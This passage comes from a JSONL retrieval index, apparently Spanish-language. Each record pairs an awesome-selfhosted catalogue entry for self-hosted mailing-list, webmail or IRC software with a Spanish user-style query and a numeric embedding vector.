-0.00129, 0.03191, -0.02038, -0.05485, -0.13177, -0.19077, 0.02515, -0.04226, -0.01216, -0.03093, -0.05886, -0.01993, -0.00234, -0.00861, 0.03648, 0.00764, 0.07733, 0.02826, -0.00179, -0.01789, 0.08955, -0.03392, -0.11731, -0.02372, -0.06349, 0.03731, -0.04417, 0.02414, 0.04979, -0.09483, 0.11644, 0.00891, -0.03612, 0.05841, -0.09931, -0.04793, -0.02408, 0.13754, 0.03887, -0.04471, 0.08694, -0.03735, -0.01014, 0.04449, -0.03064, 0.05086, 0.04103, 0.0796, -0.05858, 0.03593, -0.02137, -0.06492, -0.03804, 0.01136, -0.05505, 0.03432, 0.01496, -0.05007, 0.04211, -0.04334, 0.01133, 0.05372, -0.06118, -0.00467, 0.01084, -0.02291, -0.04551, -0.02712, -0.0461, -0.10245, -0.01496, 0.01943, 0.00917, 0.03372, -0.10984, -0.03211, -0.04102, -0.02973, 0.05424, -0.0115, -0.07093, 0.04392, 0.03661, 0.05184, -0.08764, -0.09075, -0.03514, 0.03326, -0.05897, -0.01536, 0.02791, -0.13332, -0.01486, 0.03206, 0.01337, -0.05541, 0.02693, -0.0271, 0.01113, 0.04456, 0.09204, 0.00659, -0.06202, 0.03385, 0.04198, 0.03429, 0.0873, -0.03239, 0.05647, 0.02039, -0.00523, -0.02396, -0.04723, -0.04131, -0.0126, 0.00179, -0.0084, -0.01357, 0.04972, -0.03998, -0.00872, -0.00265, -0.04961, 0.01976, -0.00233, 0.00176, 0.04946, 0.01224, 0.04546, 0.01504, -0.00932, 0.02995, -0.00194, -0.04126, -0.09476, -0.06993, -0.03181, -0.02079, -0.0206, -0.02562, -0.02448, -0.03295, 0.01579, -0.03527, 0.00125, -0.02504, 0.00416, -0.00338, -0.03007, 0.0767, -0.00245, -0.02019, -0.03172, 0.07349, -0.02643, -0.02578, 0.00866, 0.02098, 0.00924, 0.01774, -0.04866, -0.04813, 0.06229, -0.02652, 0.02474, 0.01923, 0.00198, 0.00166, 0.02878, -0.03012, -0.04043, 0.04437, -0.05923, 0.00878, -0.10564, -0.02737, -0.03411, -0.01425, 0.06325, 0.00856, 0.02369, -0.01918, -0.02641, -0.02308, -0.0347, -0.09266, -0.04464, -0.03987, -0.01983, 0.03954, -0.06883, 0.01802, -0.01724]} +{"tipo": "pregunta", "herramienta": "Communication - Email - Mailing Lists and Newsletters", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Mailing Lists and Newsletters", "tema": "communication - email - mailing lists and newsletters", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Mailing Lists and Newsletters: HyperKitty β€” Access GNU Mailman v3 archives [GPL-3.0, Python]. Keila β€” Reliable and easy-to-use newsletter tool (alternative to Mailchimp and Sendinblue) [AGPL-3.0, Docker]. Listmonk β€” High performance, self-hosted newsletter and mailing list manager with a modern dashboard [AGPL-3.0, Go/Docker]. Mailman β€” Manage electronic mail discussion and e-newsletter lists [GPL-3.0, Python]. Mautic β€” Marketing automation software (email, social and more) [GPL-3.0, PHP]. mlmmj β€” Mailing list management made joyful [MIT, C]. phpList β€” Newsletter and email marketing with advanced management of subscribers, bounces, and plugins [AGPL-3.0, PHP]. Postorius β€” Web user interface to access GNU Mailman [GPL-3.0, Python]. Schleuder β€” GPG-enabled mailing list manager with resending-capabilities [GPL-3.0, Ruby]. Sympa β€” Mailing list manager [GPL-2.0, Perl].", "indexar": "con quΓ© programa puedo gestionar listas de correo y newsletters sin pagar?", "v": [0.0242, 0.12924, -0.06601, -0.19434, 0.06215, -0.10203, 0.06551, -0.01552, -0.19593, -0.13188, -0.05996, -0.10689, 0.13695, -0.08767, -0.02722, 0.05522, 0.02184, -0.03544, 0.07108, 0.05955, 0.01666, 0.02683, -0.01305, -0.08433, -0.13237, 0.02433, 0.1029, -0.10451, -0.02541, 0.09547, 0.01401, -0.08381, 0.00702, -0.15565, 0.08122, 0.18604, 0.04644, 0.12441, -0.0179, -0.0594, 0.00099, 0.0521, -0.02719, 0.01453, -0.02927, -0.08374, 0.0468, -0.0096, 0.0658, -0.09654, -0.06042, -0.03652, -0.06689, 0.02233, 0.05751, -0.03597, -0.0129, -0.14033, -0.01129, -0.0852, -0.06535, 0.11645, 0.08077, 0.10815, -0.05369, 0.04412, 0.12558, -0.01875, -0.09976, 0.04438, 0.01097, -0.01453, 0.01149, 0.03241, -0.02516, 0.00472, 0.09966, -0.02761, -0.03444, 0.07272, 0.02548, -0.06115, 0.02627, 0.06473, -0.06475, -0.01638, 0.01792, -0.08533, -0.07457, -0.09003, 0.01344, 0.00906, -0.06114, 0.07689, 0.0194, -0.00031, 0.05163, -0.03859, -0.03938, 0.03869, -0.0737, 0.03585, -0.07978, 0.1158, -0.00835, 0.13272, 0.01855, -0.02887, -0.00652, 0.01082, -0.03622, -0.04739, -0.01795, -0.04993, -0.11448, 0.00453, -0.03878, -0.04002, 0.09245, -0.0612, -0.06534, 0.03258, 0.01682, 0.02524, 0.17271, -0.00413, 0.00099, 0.17769, -0.04868, 0.09542, -0.08539, 0.04174, -0.01796, -0.10518, -0.03775, -0.0829, -0.04181, 0.03239, -0.01046, -0.06504, -0.07194, 0.05332, 0.02291, 0.05903, 0.08267, -0.07305, -0.00283, -0.09095, -0.11942, 0.02433, 0.01001, -0.05738, 0.00951, 0.05459, -0.01106, -0.04064, 0.0595, -0.05784, -0.00907, 0.02398, -0.04578, 0.00426, -0.02697, 0.01312, 0.0385, -0.02217, 0.05122, 0.04229, 0.01695, 0.10939, 0.01225, 0.10771, 0.09374, -0.03433, -0.02587, -0.07999, 0.04428, -0.02425, 0.05959, 0.03319, -0.09154, 0.09914, 0.06285, -0.00917, -0.07591, -0.02021, -0.05785, 0.02709, 0.05386, 0.06892, -0.02308, 0.05131, -0.0145, 0.01924, 0.04554, -0.02896, -0.05589, -0.05299, -0.03855, -0.00872, -0.06546, -0.00782, 0.0323, -0.00494, -0.01047, 0.04742, -0.04915, 0.04522, 0.05894, 0.04604, 0.04685, 8e-05, 0.02799, 0.00547, -0.05762, -0.02173, 0.01961, -0.02152, 0.02112, 0.08019, 0.03284, -0.00969, 0.03706, -0.02649, -0.0275, -0.01687, 0.03416, 0.04035, 0.05042, 0.04182, -0.04889, 0.06086, 0.01184, 0.00794, 0.05163, -0.01072, -0.00213, -0.0354, -0.02692, -0.00045, 0.02006, 0.06948, 0.04701, -0.00621, -0.01908, -0.00233, -0.04039, -0.00739, -0.02724, -0.01406, -0.03945, 0.03435, 0.01624, -0.01915, 0.09648, 0.01264]} +{"tipo": "pregunta", "herramienta": "Communication - Email - Mailing Lists and Newsletters", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Mailing Lists and Newsletters", "tema": "communication - email - mailing lists and newsletters", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Mailing Lists and Newsletters: HyperKitty β€” Access GNU Mailman v3 archives [GPL-3.0, Python]. Keila β€” Reliable and easy-to-use newsletter tool (alternative to Mailchimp and Sendinblue) [AGPL-3.0, Docker]. Listmonk β€” High performance, self-hosted newsletter and mailing list manager with a modern dashboard [AGPL-3.0, Go/Docker]. Mailman β€” Manage electronic mail discussion and e-newsletter lists [GPL-3.0, Python]. Mautic β€” Marketing automation software (email, social and more) [GPL-3.0, PHP]. mlmmj β€” Mailing list management made joyful [MIT, C]. phpList β€” Newsletter and email marketing with advanced management of subscribers, bounces, and plugins [AGPL-3.0, PHP]. Postorius β€” Web user interface to access GNU Mailman [GPL-3.0, Python]. Schleuder β€” GPG-enabled mailing list manager with resending-capabilities [GPL-3.0, Ruby]. Sympa β€” Mailing list manager [GPL-2.0, Perl].", "indexar": "quΓ© alternativas libres hay para montar un servicio tipo Mailchimp en mi servidor?", "v": [-0.0255, 0.07708, -0.12994, -0.05614, -0.28794, -0.08238, -0.09827, -0.02633, -0.08602, -0.10534, -0.04301, -0.06999, 0.19905, -0.09238, 0.11955, 0.02338, 0.12267, -0.09643, 0.10887, 0.04389, -0.01287, 0.0404, -0.07507, -0.07691, -0.10164, 0.07117, 0.03251, -0.06584, -0.13022, 0.07105, 0.09042, -0.01519, -0.00865, 0.048, 0.01186, -0.06443, 0.06842, 0.06862, -0.00169, -0.00754, 0.09368, -0.09667, -0.05464, 0.05472, -0.01476, -0.0528, 0.03163, -0.03037, 0.03949, 0.06565, 0.01508, -0.03782, -0.08719, -0.03148, -0.06905, 0.07493, 0.0425, -0.13597, 0.02586, -0.04246, -0.08068, 0.11277, -0.00976, 0.05244, 0.09874, -0.07608, -0.08788, -0.06389, -0.12019, -0.01066, -0.04331, -0.09911, 0.03798, -0.05448, -0.08416, 0.05766, -0.04533, -0.0311, 0.01595, 0.1252, 0.10475, -0.0081, -0.03385, 0.09994, -0.05175, -0.07552, -0.0118, -0.05691, -0.00598, 0.0935, 0.1169, 0.14577, -0.02591, 0.18436, -0.075, -0.11527, 0.04475, 0.03557, 0.00151, 0.05679, 0.05447, 0.07179, -0.02649, 0.06023, -0.01423, -0.00117, 0.08984, -0.04678, 0.04799, -0.01796, 0.03993, 0.01207, -0.00989, 0.01477, -0.08753, -0.19157, 0.03598, -0.01088, 0.02581, 0.06663, -0.05816, 0.06875, 0.07317, 0.03867, 0.05079, -0.05545, 0.09387, 0.01289, -0.02708, 0.0259, 0.01775, -0.05144, -0.07897, -0.08664, 0.00242, 0.02501, 0.06648, -0.05547, -0.01628, -0.00753, 0.04193, -0.01168, -0.03611, -0.02579, 0.0389, -0.02491, 0.12529, -0.10415, -0.04622, -0.02834, 0.01765, -0.01404, -0.02076, 0.01772, -0.08499, -0.0301, 0.01652, -0.10485, -0.00882, 0.10411, 0.0335, 0.00944, 0.04784, 0.07415, 0.01299, -0.02689, 0.01916, 0.02447, -0.02454, 0.02337, -0.05082, 0.04372, 0.0335, -0.08546, 0.03067, -0.01454, -0.06659, -0.03671, 0.00551, 0.04138, 0.01328, -0.00339, -0.05317, 0.01285, -0.06271, -0.02443, -0.00304, -0.0332, -0.00018, 0.00137, -0.02018, 0.01302, -0.04409, -0.00865, 0.04043, -0.0416, 0.00384, -0.05108, -0.0467, -0.01098, -0.05782, -0.04659, -0.01301, 0.01235, -0.05822, -0.03099, -0.00586, 0.04683, 0.0217, 0.03774, -0.01206, -0.00513, 0.12323, -0.04335, -0.00628, 0.02264, 0.07597, -0.02129, 0.01505, -0.00507, 0.01178, -0.0312, -4e-05, -0.01867, -0.03691, 0.06145, 0.02433, 0.01322, 0.04209, 0.00935, 0.00087, 0.03472, -0.0481, 0.01387, -0.02097, -0.06496, 0.0555, -0.01795, 0.00312, -0.05855, 0.07462, 0.07589, -0.00762, 0.00601, -0.01528, -0.02977, -0.043, 0.0075, -0.05949, 0.00579, -0.01271, -0.03345, -0.0434, -0.03484, 0.02163, -0.00287]} +{"tipo": "pregunta", "herramienta": "Communication - Email - Mailing Lists and Newsletters", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Mailing Lists and Newsletters", "tema": "communication - email - mailing lists and newsletters", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Mailing Lists and Newsletters: HyperKitty β€” Access GNU Mailman v3 archives [GPL-3.0, Python]. Keila β€” Reliable and easy-to-use newsletter tool (alternative to Mailchimp and Sendinblue) [AGPL-3.0, Docker]. Listmonk β€” High performance, self-hosted newsletter and mailing list manager with a modern dashboard [AGPL-3.0, Go/Docker]. Mailman β€” Manage electronic mail discussion and e-newsletter lists [GPL-3.0, Python]. Mautic β€” Marketing automation software (email, social and more) [GPL-3.0, PHP]. mlmmj β€” Mailing list management made joyful [MIT, C]. phpList β€” Newsletter and email marketing with advanced management of subscribers, bounces, and plugins [AGPL-3.0, PHP]. Postorius β€” Web user interface to access GNU Mailman [GPL-3.0, Python]. Schleuder β€” GPG-enabled mailing list manager with resending-capabilities [GPL-3.0, Ruby]. Sympa β€” Mailing list manager [GPL-2.0, Perl].", "indexar": "cual es una herramienta potente para administrar listas de distribuciΓ³n y enviar boletines?", "v": [0.11722, 0.06786, -0.10158, -0.16037, 0.06138, -0.10717, 0.00093, -0.10423, -0.22382, -0.14134, -0.08439, -0.12059, 0.05689, -0.07475, 0.02686, 0.01628, 0.06785, -0.12423, 0.01428, -0.03915, 0.04349, 0.05668, -0.12474, -0.09454, -0.13815, -0.02638, 0.09124, -0.03743, -0.17383, 0.07744, 0.05911, -0.07053, -0.01205, -0.10141, 0.04639, 0.03831, -0.03227, 0.12622, -0.03083, 0.07018, -0.00528, 0.04338, -0.10163, -0.01751, -0.089, -0.02826, -0.05078, 0.03554, 0.10844, -0.03627, -0.11253, -0.08946, -0.10238, -0.00843, -0.00967, -0.16107, 0.1037, -0.13666, -0.00403, -0.10726, 0.00692, 0.03603, -0.02062, -0.06092, -0.08037, -0.00111, -0.0089, -0.13201, -0.18007, 0.01262, -0.02568, 0.03582, 0.01625, 0.04279, -0.02917, 0.02435, -0.06133, 0.08938, -0.02443, 0.01874, 0.01212, -0.0623, -0.06517, 0.0558, -0.03648, -0.16051, 0.1388, -0.10487, -0.0216, -0.10081, -0.0007, -0.07769, -0.02578, 0.05775, 0.04361, 0.01451, 0.05422, -0.05773, -0.0284, 0.00599, 0.04559, 0.00549, -0.09952, 0.10573, 0.0171, 0.00994, -0.07868, -0.05496, -0.00664, -0.01104, 0.00364, -0.05285, 0.02437, 0.05458, 0.01533, 0.048, -0.05134, -0.00369, 0.01802, -0.06935, 0.00137, 0.06836, -0.05571, -0.00831, 0.11634, -0.00921, 0.01985, 0.06793, 0.02269, -0.0379, 0.01921, 0.00864, -0.05559, -0.02816, 0.00499, -0.03807, -0.07161, -0.08661, 0.04509, -0.08529, -0.04675, -0.0072, 0.02743, -0.09461, 0.03741, 0.03614, 0.01168, -0.02183, -0.0198, -0.00686, 0.02605, -0.04826, -0.0083, 0.00095, 0.03653, -0.00861, -0.00717, -0.03421, -0.06579, 0.0014, 0.02517, 0.00752, 0.04861, 0.03349, 0.01403, 0.01129, 0.01004, 0.07019, 0.0242, 0.05172, 0.04045, 0.00163, 0.05489, 0.05642, -0.03976, -0.12882, -0.04897, -0.00194, 0.02055, 0.0063, -0.02478, 0.00668, -0.05581, 0.04264, 0.01172, 0.03565, -0.00957, 0.00442, 0.00331, 0.06241, 0.10679, 0.02115, 0.04774, -0.08247, 0.06236, 0.0436, -0.01777, -0.07494, -0.03255, -0.01242, -0.04139, -0.05102, -0.02178, -0.06029, 0.01477, 0.02452, -0.02451, 0.06333, -0.03653, 0.08705, 0.07761, 0.03865, 0.0058, 0.00299, -0.07596, -0.05636, -0.00712, -0.04079, 0.00049, 0.02678, 0.00338, -0.00172, 0.05601, -0.05839, 0.03727, 0.06019, -0.00782, 0.01921, 0.04472, 0.0304, -0.01845, 0.03546, 0.07043, -0.02361, 0.03013, -0.03641, 0.04895, -0.04234, -0.02285, -0.02558, -0.01824, 0.04835, 0.02809, 0.00683, -0.07003, -0.02047, -0.04354, 0.01157, -0.09599, -0.10693, -0.02416, 0.01176, 0.08693, -0.06966, 0.06668, -0.04144]} +{"tipo": "pregunta", "herramienta": "Communication - Email - Webmail Clients", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Webmail Clients", "tema": "communication - email - webmail clients", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Webmail Clients: Cypht β€” Feed reader for your email accounts [LGPL-2.1, PHP]. Roundcube β€” Browser-based IMAP client with an application-like user interface [GPL-3.0, PHP/deb]. SnappyMail β€” Simple, modern, lightweight & fast web-based email client (fork of RainLoop) [AGPL-3.0, PHP]. SquirrelMail β€” Another browser-based IMAP client [GPL-2.0, PHP].", "indexar": "que programa me sirve para ver mis correos desde el navegador de forma rΓ‘pida y sencilla?", "v": [0.04931, 0.08329, -0.17214, -0.08928, -0.03338, -0.08125, 0.08388, -0.09188, -0.02151, -0.16229, 0.01367, -0.06808, 0.13844, -0.15644, 0.11645, -0.00751, 0.15244, 0.03255, 0.08082, 0.03084, 0.05814, -0.06595, -0.03971, -0.07263, -0.08963, 0.00344, 0.0312, 0.00237, -0.04247, -0.04693, 0.00493, -0.08327, 0.03042, -0.00203, 0.01353, 0.10476, 0.13396, 0.008, -0.05244, -0.00813, 0.06608, -0.03541, -0.0566, 0.0546, -0.07247, -0.02332, 0.02086, 0.00365, -0.04023, -0.0297, -0.00107, -0.04549, -0.1391, 0.06977, -0.08769, -0.01298, 0.09356, -0.18192, 0.02071, -0.08339, 0.05431, 0.03976, 0.06229, 0.01979, 0.02428, -0.04869, 0.05701, -0.08858, -0.1444, -0.06306, 0.02016, 0.0192, 0.01758, -0.02106, -0.05546, 0.04994, -0.08565, 0.04098, 0.02475, 0.07134, 0.12218, -0.06698, -0.0493, -0.02569, -0.06655, -0.0745, -0.00031, -0.0586, -0.04778, -0.12043, 0.07617, 0.0835, -0.04572, 0.11856, -0.00609, -0.06188, -0.0216, 0.03346, -0.00014, 0.10937, -0.00236, -0.00827, -0.13533, 0.15895, -0.08062, 0.06915, 0.06041, -0.01286, 0.00113, 0.05513, -0.0078, -0.03775, -0.01737, -0.05055, -0.03692, -0.01819, -0.01662, -0.05865, -0.03516, -0.10499, -0.10121, -0.02432, -0.07596, 0.07444, 0.06974, -0.04582, -0.06383, 0.02469, 0.03329, 0.07923, -0.02596, -0.09554, -0.07553, -0.00725, -0.014, -0.04662, -0.08126, -0.08323, 0.04473, -0.07621, 0.10111, 0.06005, -0.03536, -0.04914, 0.01388, -0.01875, 0.03731, -0.10941, -0.1065, -0.06635, 0.01887, -0.05628, -0.00157, 0.00914, -0.07966, -0.02896, 0.02594, -0.08522, -0.02773, 0.06978, -0.0834, 0.03358, 0.02687, 0.04097, 0.00651, -0.11178, -0.04474, 0.04703, 0.06866, 0.11094, -0.05928, 0.04274, 0.04885, -0.09801, -0.01262, -0.01902, -0.01898, 0.0382, 0.01605, 0.0178, -0.053, 0.07178, 0.01807, 0.02859, -0.12989, -0.08305, 0.00686, 0.0297, 0.00801, -0.00335, -0.00814, 0.02739, -0.04976, 0.01298, -0.01659, 0.01592, -0.11174, -0.04642, -0.01347, -0.07575, -0.01462, -0.0867, 0.01009, 0.00372, -0.02628, 0.10569, -0.02325, -0.05888, 0.0161, 0.13063, 0.00355, -0.05096, 0.08468, -0.00893, -0.00234, -0.02893, 0.08357, 0.00577, 0.02258, 0.0345, -0.02257, -0.03706, -0.00116, 0.01663, 0.00404, -0.02684, 0.05034, 0.06244, -0.01242, 0.00937, 0.01241, -0.00228, -0.02059, -0.07783, 0.057, -0.01834, 0.01942, -0.05592, -0.04353, -0.05739, 0.00108, 0.01345, 0.00141, -0.00803, -0.02269, -0.01286, -0.08708, -0.01761, -0.04812, 0.03521, -0.06747, 0.01, 0.0312, -0.04742, 0.02703, 0.02455]} +{"tipo": "pregunta", "herramienta": "Communication - Email - Webmail Clients", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Webmail Clients", "tema": "communication - email - webmail clients", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Webmail Clients: Cypht β€” Feed reader for your email accounts [LGPL-2.1, PHP]. Roundcube β€” Browser-based IMAP client with an application-like user interface [GPL-3.0, PHP/deb]. SnappyMail β€” Simple, modern, lightweight & fast web-based email client (fork of RainLoop) [AGPL-3.0, PHP]. SquirrelMail β€” Another browser-based IMAP client [GPL-2.0, PHP].", "indexar": "con quΓ© puedo gestionar mi bandeja de entrada sin instalar nada extra en la computadora?", "v": [0.11564, 0.16082, -0.14862, -0.07659, -0.03187, -0.13592, -0.03657, 0.01431, -0.15907, -0.11032, -0.10939, -0.04396, -0.01436, -0.02911, 0.01359, 0.05582, 0.08811, -0.05818, 0.10502, -0.05223, -0.02588, -0.0407, 0.02791, -0.03687, -0.01496, 0.01597, 0.03504, 0.03554, -0.104, -0.07689, -0.01973, -0.00115, 0.13351, -0.05158, 0.0182, -0.01725, -0.01128, -0.01006, 0.06826, -0.0183, 0.04017, 0.12112, -0.00716, 0.05387, 0.17958, -0.07553, 0.14594, -0.08222, 0.01632, 0.02536, -0.08909, 0.00649, -0.07104, -0.08457, 0.0151, -0.11019, 0.08899, -0.15413, 0.13714, -0.04002, -0.10502, 0.19185, -0.09909, 0.0538, -0.0029, 0.08909, 0.01279, -0.04354, -0.02962, 0.08253, -0.07947, 0.06088, 0.00518, -0.11419, 0.01965, 0.06884, -0.00996, 0.01161, 0.1392, 0.00065, 0.02236, -0.05011, -0.01712, -0.0313, -0.05033, -0.14975, -0.00468, -0.05682, -0.01058, 0.01595, 0.03001, -0.01941, -0.04258, -0.04663, 0.09342, -0.03373, 0.12823, 0.06933, -0.04928, 0.01496, 0.07428, 0.02751, -0.04272, 0.20289, -0.05303, 0.03014, 0.05732, -0.11961, 0.07227, -0.11659, 0.05076, 0.03166, -0.05977, -0.00546, -0.08527, 0.01192, 0.03343, 0.00991, -0.0729, 0.00746, -0.09087, 0.00356, 0.0901, 0.01488, 0.01457, -0.06397, 0.02792, 0.08085, -0.06094, -0.01815, 0.00167, -0.12522, 0.03773, -0.0266, -0.06389, 0.02197, -0.11464, -0.08799, -0.01899, -0.07624, 0.01586, 0.11511, -0.05652, -0.02023, 0.04109, 0.06963, 0.01847, 0.00156, -0.06388, -0.04733, 0.04742, 0.00734, -0.00205, 0.08699, 0.00357, 0.06702, 0.08298, 0.03806, -0.05835, -0.01261, -0.02782, 0.06567, 0.02097, 0.0317, -0.03772, 0.01054, -0.06154, -0.00559, 0.02884, 0.07322, -0.09848, 0.04591, 0.0103, -0.01993, 0.02972, -0.03667, -0.03192, -0.05663, 0.03209, 0.01706, 0.00211, 0.08356, 0.00378, -0.01779, -0.06766, -0.00652, -0.06642, 0.01415, -0.04585, 0.00617, 0.03244, 0.01997, -0.03019, -0.01816, 0.04433, -0.00363, -0.04898, -0.03764, -0.01666, 0.02656, -0.05317, 0.0217, -0.07495, -0.00174, 0.07508, 0.06952, -0.05066, 0.00472, 0.03584, 0.07194, 0.01957, 0.01047, -0.01864, -0.01742, -0.06069, -0.01534, 0.05158, 0.01652, 0.03587, -0.02605, 0.06377, 0.02693, 0.06874, -0.01078, -0.00381, -0.02168, -0.01087, 0.02457, -0.01948, 0.01531, -0.05726, 0.01759, 0.00379, 0.01247, -0.01079, 0.00757, 0.02039, -0.0609, -0.04797, 0.03762, 0.00084, 0.04865, 0.04769, -0.0931, -0.03704, -0.01352, -0.06398, 0.00271, -0.07433, -0.05097, -0.01377, -0.00419, -0.01302, -0.0307, -0.00401, 0.07923]} +{"tipo": "pregunta", "herramienta": "Communication - Email - Webmail Clients", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Webmail Clients", "tema": "communication - email - webmail clients", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Webmail Clients: Cypht β€” Feed reader for your email accounts [LGPL-2.1, PHP]. Roundcube β€” Browser-based IMAP client with an application-like user interface [GPL-3.0, PHP/deb]. SnappyMail β€” Simple, modern, lightweight & fast web-based email client (fork of RainLoop) [AGPL-3.0, PHP]. SquirrelMail β€” Another browser-based IMAP client [GPL-2.0, PHP].", "indexar": "existe alguna alternativa libre a los clientes de correo tradicionales que funcione en el navegador?", "v": [0.02111, 0.10166, -0.25297, -0.01267, -0.08416, -0.04081, 0.11054, -0.04436, -0.14324, -0.16959, -0.00155, -0.16319, 0.07567, 0.00286, 0.14892, -0.09738, 0.07979, -0.07759, 0.14845, -0.04729, -0.10744, -0.03162, -0.10529, -0.02216, -0.04645, -0.09444, -0.04673, -0.0334, -0.05634, 0.04568, 0.08483, -0.05647, 0.10144, -0.04216, -0.01964, -0.00599, 0.06587, 0.00464, 0.01287, -0.11999, 0.16239, -0.08613, -0.07488, 0.04476, -0.12156, 0.02203, -0.09901, -0.03056, -0.04473, 0.04216, -0.04955, -0.07366, -0.13549, 0.02604, 0.03038, 0.03682, 0.1139, -0.07823, 0.04796, -0.05397, 0.02559, 0.08337, 0.10061, 0.00806, 0.05567, -0.01717, 0.03976, -0.08284, -0.00034, 0.033, 0.00138, 0.05041, -0.03987, 0.00824, -0.05898, 0.07916, 0.01421, 0.05159, -0.02836, 0.07897, 0.10101, -0.03223, -0.02166, -0.06017, -0.10397, -0.10802, 0.03721, -0.13596, -0.01317, -0.05697, 0.10313, 0.06777, 0.00951, 0.12855, -0.02394, -0.10487, -0.03402, -0.00848, 0.03758, 0.07296, 0.05347, 0.08605, -0.06306, 0.04124, 0.08605, -0.03944, 0.09246, -0.05048, 0.01829, 0.06929, -0.0363, -0.01548, -0.06159, -0.04092, -0.06388, 0.00554, -0.09692, -0.06178, -0.01897, 0.00267, -0.10593, 0.01406, -0.03259, 0.0157, -0.03205, 0.01075, -0.04403, 0.08529, -0.02342, 0.0097, 0.04022, -0.08518, -0.05923, -0.03466, -0.07964, 0.02769, 0.05975, 0.00623, 0.02482, -0.0222, 0.03789, 0.00305, -0.03577, -0.04187, 0.07942, -0.02931, 0.02859, -0.01393, -0.10786, -0.07153, -0.07813, -0.048, -0.05437, 0.06708, -0.03044, 0.04131, -0.02938, -0.04859, 0.02157, 0.17782, 0.01758, -0.02683, 0.03921, 0.05223, -0.07481, -0.00657, -0.08987, -0.01666, 0.01922, 0.03485, -0.01375, 0.06311, 0.06935, -0.13636, 0.02507, 0.01876, -0.06036, -0.02308, 0.10868, -0.01715, 0.02306, 0.02718, -0.07134, -0.02325, -0.02416, -0.04584, -0.01487, 0.00513, -0.05287, 0.0236, 0.00282, 0.00179, -0.09173, -0.04413, -0.0119, 0.02232, -0.01815, -0.06734, -0.04106, -0.02209, -0.0548, -0.01944, 0.02941, -0.06369, -0.03005, 0.05212, -0.00993, 0.02705, 0.01683, 0.07898, 0.04772, -0.04357, 0.06373, -0.0112, 0.00493, 0.01099, 0.03737, -0.07605, -0.00483, -0.00801, 0.01116, -0.03367, 0.01055, 0.03501, 0.0211, 0.03144, 0.06461, 0.06112, -0.01556, 0.01405, 0.03549, 0.01311, -0.03677, -0.02716, 0.03191, 0.01415, 0.02785, -0.01706, -0.03074, 0.00013, 0.05173, 0.03997, -0.00751, 0.00575, -0.0188, -0.00284, -0.11066, -0.03355, -0.00661, -0.01664, -0.06742, 0.03766, 0.00468, 0.00031, 0.03401, 0.00173]} +{"tipo": "pregunta", "herramienta": "Communication - IRC", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - IRC", "tema": "communication - irc", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - IRC: Ergo β€” Modern IRCv3 server written in Go, combining the features of an ircd, a services framework, and a bouncer [MIT, Go/Docker]. Glowing Bear β€” A web frontend for WeeChat [GPL-3.0, Nodejs]. InspIRCd β€” Modular IRC server written in C++ for Linux, BSD, Windows, and macOS [GPL-2.0, C++/Docker]. Kiwi IRC β€” Responsive web IRC client with theming support [Apache-2.0, Nodejs]. ngircd β€” Portable and lightweight Internet Relay Chat server for small or private networks [GPL-2.0, C/deb]. Quassel IRC β€” Distributed IRC client, meaning that one (or multiple) client(s) can attach to and detach from a central core [GPL-2.0, C++]. Robust IRC β€” IRC without netsplits. Distributed IRC server, based on RobustSession protocol [BSD-3-Clause, Go]. The Lounge β€” Self-hosted web IRC client [MIT, Nodejs/Docker]. UnrealIRCd β€” Modular, advanced and highly configurable IRC server written in C for Linux, BSD, Windows, and macOS [GPL-2.0, C]. Weechat β€” Fast, light and extensible chat client [GPL-3.0, C/Docker/deb]. ZNC β€” Advanced IRC bouncer [Apache-2.0, C++/deb].", "indexar": "que programa hay para montar un servidor de IRC moderno que soporta el protocolo IRCv3?", "v": [0.03178, -0.11052, -0.18007, -0.2118, 0.02392, -0.11475, 0.16408, -0.01677, -0.03767, -0.00416, 0.0212, -0.04854, 0.24803, -0.18377, 0.10322, 0.13349, -0.02383, 0.03437, -0.01093, 0.04926, 0.00572, -0.04898, 0.01585, 0.01778, 0.09385, 0.04205, -0.0759, -0.01057, 0.01431, -0.09879, 0.07718, 0.03627, 0.06737, 0.02787, -0.02932, -0.14407, 0.08365, 0.02386, -0.08001, 0.05597, 0.05519, -0.09388, -0.07316, 0.00692, 0.11509, -0.00222, 0.11656, -0.11971, 0.00224, -0.02001, -0.016, -0.04504, -0.01137, 0.06635, -0.09756, 0.10443, -0.04692, -0.02372, 0.05135, -0.06899, -0.0417, 0.10122, -0.00304, 0.04344, 0.06307, 0.02835, -0.05614, -0.03871, -0.08506, -0.10366, -0.06117, -0.07343, 0.09037, -0.09891, 0.01672, -0.00591, -0.06899, -0.03244, 0.08238, 0.01447, -0.04279, 0.08176, 0.03466, 0.07669, -0.08942, 0.054, 0.12487, -0.05728, 0.05494, 0.01858, 0.03918, 0.02749, -0.02932, 0.00736, 0.12329, -0.07735, 0.14558, 0.04058, 0.05757, 0.05131, -0.01341, -0.00939, -0.04855, 0.05089, -0.015, 0.13766, 0.13004, -0.10417, 0.02989, -0.04349, -0.0476, 0.06236, 0.02739, 0.04143, -0.03029, -0.01774, 0.01148, 0.04813, 0.0501, 0.00646, -0.04173, 0.03422, -0.01372, 0.09759, 0.07324, -0.06618, 0.02482, 0.10535, 0.03608, 0.04244, -0.02044, -0.02506, -0.06728, -0.07428, -0.04508, -0.00147, -0.01557, -0.04079, -0.06585, 